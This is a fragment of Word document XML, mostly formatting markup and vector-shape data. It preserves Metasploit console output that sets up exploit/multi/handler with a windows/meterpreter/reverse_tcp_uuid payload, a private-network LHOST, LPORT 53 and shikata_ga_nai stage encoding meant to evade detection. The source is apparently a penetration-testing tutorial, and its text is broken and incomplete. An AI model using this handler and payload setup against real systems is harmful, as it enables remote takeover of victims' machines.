        <v:shape style="position:absolute;left:1177;top:13537;width:82;height:342" coordorigin="1177,13537" coordsize="82,342" path="m1217,13546l1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13547,1217,13547,1217,13547,1217,13547,1217,13547,1217,13548,1217,13548,1217,13548,1217,13548,1217,13549,1217,13549,1217,13550,1217,13550,1217,13550,1217,13551,1217,13551,1217,13552,1217,13553,1217,13553,1217,13554,1217,13555,1217,13555,1217,13556,1217,13557,1217,13558,1217,13559,1217,13560,1217,13561,1217,13562,1217,13563,1217,13564,1217,13565,1217,13567,1217,13568,1217,13569,1217,13571,1217,13572,1217,13574,1217,13575,1217,13577,1217,13579,1217,13580,1217,13582,1217,13584,1217,13586,1217,13588,1217,13590,1217,13593,1217,13595,1217,13597,1217,13600,1217,13602,1217,13605,1217,13607,1217,13610,1217,13613,1217,13616,1217,13619,1217,13622,1217,13625,1217,13628,1217,13631,1217,13635,1217,13638,1217,13642,1217,13645,1217,13649,1217,13653,1217,13657,1217,13661,1217,13665,1217,13669,1217,13673,1217,13678,1217,13682,1217,13687,1217,13691,1217,13696,1217,13701,1217,13706,1217,13711,1217,13717,1217,13722,1217,13727,1217,13733,1217,13739,1217,13744,1217,13750,1217,13756,1217,13762,1217,13769,1217,13775,1217,13781,1217,13788,1217,13795,1217,13802,1217,13809,1217,13816,1217,13823,1217,13830,1217,13838,1217,13845,1217,13853,1217,13861e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:692.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13857" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13857;width:82;height:322" coordorigin="1177,13857" coordsize="82,322" path="m1217,13861l1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13862,1217,13862,1217,13862,1217,13862,1217,13862,1217,13862,1217,13863,1217,13863,1217,13863,1217,13863,1217,13864,1217,13864,1217,13864,1217,13865,1217,13865,1217,13866,1217,13866,1217,13867,1217,13867,1217,13868,1217,13869,1217,13869,1217,13870,1217,13871,1217,13872,1217,13872,1217,13873,1217,13874,1217,13875,1217,13876,1217,13877,1217,13878,1217,13879,1217,13881,1217,13882,1217,13883,1217,13885,1217,13886,1217,13888,1217,13889,1217,13891,1217,13892,1217,13894,1217,13896,1217,13898,1217,13899,1217,13901,1217,13903,1217,13906,1217,13908,1217,13910,1217,13912,1217,13915,1217,13917,1217,13919,1217,13922,1217,13925,1217,13927,1217,13930,1217,13933,1217,13936,1217,13939,1217,13942,1217,13946,1217,13949,1217,13952,1217,13956,1217,13959,1217,13963,1217,13967,1217,13970,1217,13974,1217,13978,1217,13982,1217,13987,1217,13991,1217,13995,1217,14000,1217,14004,1217,14009,1217,14014,1217,14019,1217,14024,1217,14029,1217,14034,1217,14039,1217,14044,1217,14050,1217,14056,1217,14061,1217,14067,1217,14073,1217,14079,1217,14085,1217,14092,1217,14098,1217,14105,1217,14111,1217,14118,1217,14125,1217,14132,1217,14139,1217,14146,1217,14154,1217,14161e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:707.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14157" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14157;width:82;height:322" coordorigin="1177,14157" coordsize="82,322" path="m1217,14161l1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14162,1217,14162,1217,14162,1217,14162,1217,14162,1217,14162,1217,14162,1217,14163,1217,14163,1217,14163,1217,14163,1217,14164,1217,14164,1217,14164,1217,14165,1217,14165,1217,14166,1217,14166,1217,14167,1217,14167,1217,14168,1217,14168,1217,14169,1217,14170,1217,14171,1217,14171,1217,14172,1217,14173,1217,14174,1217,14175,1217,14176,1217,14177,1217,14178,1217,14179,1217,14181,1217,14182,1217,14183,1217,14185,1217,14186,1217,14187,1217,14189,1217,14191,1217,14192,1217,14194,1217,14196,1217,14198,1217,14200,1217,14202,1217,14204,1217,14206,1217,14208,1217,14210,1217,14212,1217,14215,1217,14217,1217,14220,1217,14223,1217,14225,1217,14228,1217,14231,1217,14234,1217,14237,1217,14240,1217,14243,1217,14247,1217,14250,1217,14253,1217,14257,1217,14261,1217,14264,1217,14268,1217,14272,1217,14276,1217,14280,1217,14284,1217,14289,1217,14293,1217,14297,1217,14302,1217,14307,1217,14312,1217,14316,1217,14321,1217,14327,1217,14332,1217,14337,1217,14343,1217,14348,1217,14354,1217,14360,1217,14365,1217,14372,1217,14378,1217,14384,1217,14390,1217,14397,1217,14403,1217,14410,1217,14417,1217,14424,1217,14431,1217,14438,1217,14446,1217,14453,1217,14461,1217,14468,1217,14476e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:722.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14457" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14457;width:82;height:322" coordorigin="1177,14457" coordsize="82,322" path="m1217,14476l1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14477,1217,14477,1217,14477,1217,14477,1217,14477,1217,14477,1217,14477,1217,14477,1217,14478,1217,14478,1217,14478,1217,14478,1217,14478,1217,14479,1217,14479,1217,14479,1217,14480,1217,14480,1217,14481,1217,14481,1217,14482,1217,14482,1217,14483,1217,14483,1217,14484,1217,14485,1217,14485,1217,14486,1217,14487,1217,14488,1217,14489,1217,14489,1217,14490,1217,14491,1217,14493,1217,14494,1217,14495,1217,14496,1217,14497,1217,14499,1217,14500,1217,14501,1217,14503,1217,14504,1217,14506,1217,14508,1217,14509,1217,14511,1217,14513,1217,14515,1217,14517,1217,14519,1217,14521,1217,14523,1217,14525,1217,14528,1217,14530,1217,14532,1217,14535,1217,14537,1217,14540,1217,14543,1217,14546,1217,14548,1217,14551,1217,14554,1217,14558,1217,14561,1217,14564,1217,14567,1217,14571,1217,14575,1217,14578,1217,14582,1217,14586,1217,14590,1217,14594,1217,14598,1217,14602,1217,14606,1217,14611,1217,14615,1217,14620,1217,14624,1217,14629,1217,14634,1217,14639,1217,14644,1217,14649,1217,14654,1217,14660,1217,14665,1217,14671,1217,14677,1217,14682,1217,14688,1217,14694,1217,14701,1217,14707,1217,14713,1217,14720,1217,14727,1217,14733,1217,14740,1217,14747,1217,14754,1217,14762,1217,14769,1217,14776e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:737.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14757" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14757;width:82;height:322" coordorigin="1177,14757" coordsize="82,322" path="m1217,14776l1217,14776,1217,14776,1217,14776,1217,14776,1217,14776,1217,14776,1217,14776,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14778,1217,14778,1217,14778,1217,14778,1217,14779,1217,14779,1217,14779,1217,14780,1217,14780,1217,14780,1217,14781,1217,14781,1217,14782,1217,14782,1217,14783,1217,14783,1217,14784,1217,14785,1217,14785,1217,14786,1217,14787,1217,14788,1217,14789,1217,14790,1217,14791,1217,14792,1217,14793,1217,14794,1217,14795,1217,14796,1217,14797,1217,14799,1217,14800,1217,14801,1217,14803,1217,14804,1217,14806,1217,14808,1217,14809,1217,14811,1217,14813,1217,14815,1217,14817,1217,14819,1217,14821,1217,14823,1217,14825,1217,14828,1217,14830,1217,14832,1217,14835,1217,14838,1217,14840,1217,14843,1217,14846,1217,14849,1217,14852,1217,14855,1217,14858,1217,14861,1217,14864,1217,14868,1217,14871,1217,14875,1217,14878,1217,14882,1217,14886,1217,14890,1217,14894,1217,14898,1217,14902,1217,14906,1217,14911,1217,14915,1217,14920,1217,14924,1217,14929,1217,14934,1217,14939,1217,14944,1217,14949,1217,14955,1217,14960,1217,14965,1217,14971,1217,14977,1217,14983,1217,14989,1217,14995,1217,15001,1217,15007,1217,15014,1217,15020,1217,15027,1217,15033,1217,15040,1217,15047,1217,15054,1217,15062,1217,15069,1217,15077e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:752.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,15057" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:15057;width:82;height:322" coordorigin="1177,15057" coordsize="82,322" path="m1217,15077l1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15078,1217,15078,1217,15078,1217,15078,1217,15078,1217,15079,1217,15079,1217,15079,1217,15080,1217,15080,1217,15081,1217,15081,1217,15081,1217,15082,1217,15082,1217,15083,1217,15084,1217,15084,1217,15085,1217,15086,1217,15086,1217,15087,1217,15088,1217,15089,1217,15090,1217,15091,1217,15092,1217,15093,1217,15094,1217,15095,1217,15096,1217,15098,1217,15099,1217,15100,1217,15102,1217,15103,1217,15105,1217,15106,1217,15108,1217,15110,1217,15111,1217,15113,1217,15115,1217,15117,1217,15119,1217,15121,1217,15123,1217,15126,1217,15128,1217,15130,1217,15133,1217,15135,1217,15138,1217,15140,1217,15143,1217,15146,1217,15149,1217,15152,1217,15155,1217,15158,1217,15161,1217,15164,1217,15168,1217,15171,1217,15175,1217,15178,1217,15182,1217,15186,1217,15190,1217,15194,1217,15198,1217,15202,1217,15206,1217,15211,1217,15215,1217,15220,1217,15225,1217,15229,1217,15234,1217,15239,1217,15244,1217,15249,1217,15255,1217,15260,1217,15266,1217,15271,1217,15277,1217,15283,1217,15289,1217,15295,1217,15301,1217,15307,1217,15314,1217,15320,1217,15327,1217,15334,1217,15340,1217,15347,1217,15355,1217,15362,1217,15369,1217,15377e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:767.874pt;width:4.125pt;height:17.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,15357" coordsize="82,342">
        <v:shape style="position:absolute;left:1177;top:15357;width:82;height:342" coordorigin="1177,15357" coordsize="82,342" path="m1217,15377l1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15378,1217,15378,1217,15378,1217,15378,1217,15378,1217,15378,1217,15379,1217,15379,1217,15379,1217,15380,1217,15380,1217,15380,1217,15381,1217,15381,1217,15382,1217,15382,1217,15383,1217,15383,1217,15384,1217,15385,1217,15385,1217,15386,1217,15387,1217,15388,1217,15389,1217,15390,1217,15391,1217,15392,1217,15393,1217,15394,1217,15395,1217,15396,1217,15397,1217,15399,1217,15400,1217,15402,1217,15403,1217,15405,1217,15406,1217,15408,1217,15410,1217,15411,1217,15413,1217,15415,1217,15417,1217,15419,1217,15421,1217,15424,1217,15426,1217,15428,1217,15431,1217,15433,1217,15436,1217,15438,1217,15441,1217,15444,1217,15447,1217,15450,1217,15453,1217,15456,1217,15459,1217,15462,1217,15465,1217,15469,1217,15473,1217,15476,1217,15480,1217,15484,1217,15488,1217,15492,1217,15496,1217,15500,1217,15504,1217,15509,1217,15513,1217,15518,1217,15522,1217,15527,1217,15532,1217,15537,1217,15542,1217,15547,1217,15553,1217,15558,1217,15564,1217,15569,1217,15575,1217,15581,1217,15587,1217,15593,1217,15599,1217,15606,1217,15612,1217,15619,1217,15626,1217,15633,1217,15639,1217,15647,1217,15654,1217,15661,1217,15669,1217,15676,1217,15684,1217,15692e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:347.399pt;height:168.6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auxiliary(server/socks4a)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exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2313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payload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windows/meterpreter/reverse_tcp_uuid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payload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16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17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windows/meterpreter/reverse_tcp_uuid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="5446" w:firstLine="0"/>
      </w:pP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7"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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7"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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7"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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7"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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lhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="117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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168.1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="117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lhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="115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192.168.1.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="6317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lport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53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lport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="120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20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53</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="3773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stageencoder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x86/shikata_ga_nai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stageencoder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="120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20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x86/shikata_ga_nai</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="4415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EnableStageEncoding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EnableStageEncoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="1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20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0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exitonsession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false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23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exitonsession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=&gt;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false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23" w:after="0" w:line="611" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="6087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msf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exploit(multi/handler)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options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Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="121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options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="121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(exploit/multi/handler):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1675" w:right="5635" w:firstLine="0"/>
      </w:pP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w w:val="122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Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122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Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122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Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122"/>
          <w:spacing w:val="6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Description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="134"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="134"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="134"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>---------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="134"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="134"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="134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34"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-----------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0" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0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Payload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options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="118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w w:val="118"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(windows/meterpreter/reverse_tcp_uuid):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="338" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2635"/>
        </w:tabs>
        <w:spacing w:before="0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21"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:tab/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Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="1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Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="1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Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="1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21"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2395"/>
        </w:tabs>
        <w:spacing w:before="23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32"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>----</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="132"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>---------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="132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w w:val="132"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="132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w w:val="132"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-----------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4136"/>
          <w:tab w:val="left" w:pos="4871"/>
        </w:tabs>
        <w:spacing w:before="23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EXITFUNC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-110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process</w:t>
      </w:r>
      <w:r>
        <w:tab/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yes</w:t>
      </w:r>
      <w:r>
        <w:tab/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Exit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technique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3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(Accepted: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3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'',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seh,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3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thread,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3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process,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22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none)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2650"/>
          <w:tab w:val="left" w:pos="4106"/>
          <w:tab w:val="left" w:pos="4841"/>
        </w:tabs>
        <w:spacing w:before="23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12"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LHOST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pacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168.1.5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pacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>yes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w w:val="112"/>
          <w:spacing w:val="50"/>
        </w:rPr>
        <w:t> </w:t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listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="112"/>
          <w:spacing w:val="51"/>
        </w:rPr>
        <w:t> </w:t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address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tabs>
          <w:tab w:val="left" w:pos="2635"/>
          <w:tab w:val="left" w:pos="3776"/>
          <w:tab w:val="left" w:pos="4511"/>
        </w:tabs>
        <w:spacing w:before="23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12"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LPORT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pacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53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pacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:tab/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w w:val="112"/>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t> </w:t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listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="112"/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="112"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>port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5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Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="115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w w:val="115"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>target:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="338" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1675" w:right="9277" w:firstLine="0"/>
      </w:pP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Id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122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w w:val="122"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="139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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="139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w w:val="139"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>----</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="1675" w:right="0" w:firstLine="0"/>
      </w:pP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w w:val="119"/>
        </w:rPr>
